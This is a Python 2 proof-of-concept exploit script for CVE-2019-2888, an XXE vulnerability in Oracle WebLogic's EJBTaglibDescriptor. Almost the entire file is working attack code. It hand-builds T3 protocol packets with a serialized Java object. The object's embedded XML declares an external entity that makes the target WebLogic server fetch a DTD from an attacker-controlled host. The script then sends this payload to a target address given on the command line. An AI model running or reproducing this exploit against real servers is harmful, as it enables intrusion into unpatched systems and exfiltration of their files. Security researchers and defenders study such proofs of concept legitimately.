#coding=utf-8
#!/usr/bin/python
import socket
import sys
import struct

banner = '''

 _       __     __    __            _         _  ___  __ ______
| |     / /__  / /_  / /___  ____ _(_)____   | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/   |   /|   // __/   
| |/ |/ /  __/ /_/ / / /_/ / /_/ / / /__    /   |/   |/ /___   
|__/|__/\___/_.___/_/\____/\__, /_/\___/   /_/|_/_/|_/_____/   
                          /____/                               

     CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞

                  python By jas502n

              
'''
print banner

def payload(ip,port):

    s1 = 'aced00057372002f7765626c6f6769632e736572766c65742e656a62326a73702e64642e454a425461676c696244657363726970746f7282ded23716d9cc790c000078707a0000'
    s2 = '041a3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e3c21444f435459504520786d6c726f6f746e616d65205b3c21454e544954592025206161612053595354454d2022687474703a2f2f'
    s3 = ('%s:%s'%(ip,port)).encode('hex') 
    s4 = '2f6578742e647464223e256161613b256363633b256464643b5d3e2f7777772e6265612e636f6d2f736572766572732f776c733630302f6474642f7765626c6f6769632d656a62326a73702e647464223e0a3c656a62326a73702d7461676c69623e0a20203c66696c6573797374656d2d696e666f3e0a202020203c6a617661632d706174683e3c2f6a617661632d706174683e0a202020203c6a617661632d666c6167733e3c2f6a617661632d666c6167733e0a202020203c636f6d70696c652d636c617373706174683e0a202020203c2f636f6d70696c652d636c617373706174683e0a202020203c6b65657067656e6572617465643e66616c73653c2f6b65657067656e6572617465643e0a202020203c736f757263652d706174683e0a202020203c2f736f757263652d706174683e0a202020203c7061636b6167652d6e616d653e3c2f7061636b6167652d6e616d653e0a202020203c656a622d6a61722d66696c653e3c2f656a622d6a61722d66696c653e0a202020203c736176652d61733e3c2f736176652d61733e0a202020203c736176652d7461676c69622d6a61723e0a2020202020203c746d706469723e3c2f746d706469723e0a2020202020203c7461676c69622d6a61722d66696c653e3c2f7461676c69622d6a61722d66696c653e0a202020203c2f736176652d7461676c69622d6a61723e0a202020203c736176652d7461676c69622d6469726563746f72793e0a2020202020203c636c61737365732d6469726563746f72793e3c2f636c61737365732d6469726563746f72793e0a2020202020203c746c642d66696c653e3c2f746c642d66696c653e0a202020203c2f736176652d7461676c69622d6469726563746f72793e0a20203c2f66696c6573797374656d2d696e666f3e0a20203c656a623e0a202020203c656a622d6e616d653e3c2f656a622d6e616d653e0a202020203c72656d6f74652d747970653e3c2f72656d6f74652d747970653e0a202020203c686f6d652d747970653e3c2f686f6d652d747970653e0a202020203c6a6e64692d6e616d653e3c2f6a6e64692d6e616d653e0a202020203c656a622d747970653e3c2f656a622d747970653e0a202020203c656e61626c65643e747275653c2f656e61626c65643e0a202020203c656a622d6d6574686f64733e0a202020203c2f656a622d6d6574686f64733e0a202020203c686f6d652d6d6574686f64733e0a202020203c2f686f6d652d6d6574686f64733e'
    s5 = '0' + hex(len((s2 + s3 + s4).decode('hex')))[2:]
    s6 = '771c0a20203c2f656a623e0a3c2f656a62326a73702d7461676c69623e0a78'
    payloadObj = (s1 + s5 + (s2 + s3 + s4) + s6).decode('hex')
    send_poc(payloadObj)


def send_poc(payloadObj):

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    server_address = (sys.argv[1], int(sys.argv[2]))
    print 'connecting to %s port %s' % server_address
    sock.connect(server_address)
    
    # Send headers
    headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
    print 'sending "%s"' % headers
    sock.sendall(headers)
    
    data = sock.recv(1024)
    print >>sys.stderr, 'received "%s"' % data
    
    # payloadObj = open(sys.argv[3],'rb').read()
    
    payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
    payload=payload+payloadObj
    payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
    
    # adjust header for appropriate message length
    payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
    
    print 'sending payload...'
    sock.send(payload)

if __name__ == '__main__':
    if len(sys.argv) !=3:
        sys.exit("[+] Usage: python %s weblogic_ip weblogic_port\n" % sys.argv[0])
    # dtd http server
    # http://10.10.20.166:8989/
    # ip = '10.10.20.100'
    # port = '8989'
    ip = raw_input("[+] XXE_IP= ")
    port = raw_input("[+] XXE_IP= ")
    print "[+] http://" + ip + ':' + port + '/ext.dtd\n'
    payload(ip,port)








